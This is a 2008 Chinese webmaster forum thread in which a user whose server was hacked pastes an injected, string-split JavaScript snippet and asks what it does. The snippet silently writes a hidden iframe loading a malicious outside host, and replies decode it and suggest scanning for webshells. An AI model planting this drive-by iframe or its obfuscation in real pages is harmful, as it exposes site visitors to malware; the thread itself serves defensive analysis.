如何落伍 | 站长实名俱乐部 | 站长知道 | 全国站长圈 | 落伍预告 | 落伍分类 | 站长运营 | 赚钱 | 代码 | 现金任务 | 招聘 | 交易 | 落伍DIY | 帐号保护
推荐:图铃+艺术签名效果强!墨者推出江民杀毒,5元一个,效果好美图:20元1000IP、周付佣金反馈提成活动ACS金玉满堂
天寻网络租用699/月 空间30元/月域名1元 空间10元 酷睿租用699起炎黄网络:P4月付399元 送8G硬防赚钱:Q号+艺术签名效果超强!
挚盟广告联盟,收入满100送100英拓酷睿租用598/月,5199/年比VPS更稳定的VM虚拟服务器P4 3.0/1G/160G/10M独享-550元
DNSPod智能DNS,我们一直在免费莆阳:E4500/2G季付1999元送产权雅唐空间100元.南京双线租用699元独享百兆托管9000/年,租1399/月
‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[Windows] 服务器被挂马多了一串JS,请问高手是什么意思

hayaya

落伍者

Rank: 5Rank: 5

UID
205418 
帖子
101 
精华
0 
积分
46 
贡献
115  
特长
 
在线时间
226 小时 
注册时间
2006-3-24 
楼主 发表于 2008-7-10 23:47  只看该作者

服务器被挂马多了一串JS,请问高手是什么意思

<script>
;var ss=document.cookie;
var aa=ss.indexOf("showtable");
if(aa!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="showtable=true;expires="+expires.toGMTString();
document.write("<if"+"rAm"+"e sRc=ht"+"tp"+":/"+"/ba"+"t.0da"+"ybo"+"x.c"+"n/  "+"wid"+"th=1"+"00 hei"+"ght"+"=0></iF"+"ra"+"me>");};
</script>

卡巴斯基没反应,但360安全卫士会提示屏蔽了一个恶意代码和广告:http://vistas01.cn/bbs/gm.htm

请高手帮忙分析下
武汉妈妈QQ头像

TOP

hao32

落伍超级斑竹

Rank: 10Rank: 10Rank: 10

UID
108879 
帖子
521 
精华
0 
积分
507 
贡献
-10  
特长
服务器优化,安全 
来自
土星 
在线时间
423 小时 
注册时间
2005-3-26 
2楼 发表于 2008-7-11 10:53  只看该作者
如果不是arp的话, 先找到这段代码在你网站文件里, 然后扫描下你的站点文件里是不是有木马文件, aspshell phpshell什么的

Blog | LinuxSense | linuxsense.cn | Make Money | wwe | UT

TOP

成龙之龙

落伍者

Rank: 5Rank: 5

UID
213988 
帖子
313 
精华
0 
积分
118 
贡献
202  
特长
寸有所长 
在线时间
538 小时 
注册时间
2006-5-1 
3楼 发表于 2008-7-11 11:12  只看该作者
就是用JS写出:
<ifrAme sRc=http//bat.0daybox.cn/ width=100 height=0></iFrame>)
小站:http://www.difang.net.cn
地方站长论坛,希望与做地方站的朋友交流.

TOP

spidergood

落伍者

Rank: 5Rank: 5

UID
246900 
帖子
2724 
精华
0 
积分
1056 
贡献
167  
特长
 
来自
四川 
在线时间
244 小时 
注册时间
2006-9-15 
4楼 发表于 2008-7-11 12:15  只看该作者
这个挂马还搞得比较麻烦呢
六线虚拟主机,1G空间/100元半年,可放论坛,南北互联! QQ:82649045

TOP

hayaya

落伍者

Rank: 5Rank: 5

UID
205418 
帖子
101 
精华
0 
积分
46 
贡献
115  
特长
 
在线时间
226 小时 
注册时间
2006-3-24 
5楼 发表于 2008-7-12 00:01  只看该作者
谢谢各位高人指点!
武汉妈妈QQ头像

TOP

chenwb_2001

落伍者

Rank: 5Rank: 5

开国元老

UID
80556 
帖子
214 
精华
0 
积分
207 
贡献
92  
特长
服务器安全配置 
来自
上海 
在线时间
44 小时 
注册时间
2001-9-6 
6楼 发表于 2008-7-23 14:56  只看该作者
  js 挂frame马,360根据height weight -=0 判断的吧
总之就是
QQ 1924236 专业服务器安全,防黑 提供服务器安全配置,web程序定制修改,php反编译(dezend)技术服务 服务器安全淘宝店

TOP

lvxuesj

落伍者

Rank: 5Rank: 5

风蚀的王者

UID
113690 
帖子
4109 
精华
0 
积分
3210 
贡献
72  
特长
太阳☼ 
来自
南昌 
在线时间
499 小时 
注册时间
2005-5-9 
7楼 发表于 2008-7-23 17:48  只看该作者
document.write("<if"+"rAm"+"e sRc=ht"+"tp"+":/"+"/ba"+"t.0da"+"ybo"+"x.c"+"n/  "+"wid"+"th=1"+"00 hei"+"ght"+"=0></iF"+"ra"+"me>");};


这个分开写而已。
品牌研究
百度hi
江西网站空间
江西网站优化

TOP

王飞龙

落伍者

Rank: 5Rank: 5

UID
262224 
帖子
527 
精华
0 
积分
166 
贡献
154  
特长
武术 
在线时间
94 小时 
注册时间
2006-11-20 
8楼 发表于 2008-7-24 23:51  只看该作者
麻烦呀
跆拳道-www.97sese.com-97sese.com-唐朝电影院

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题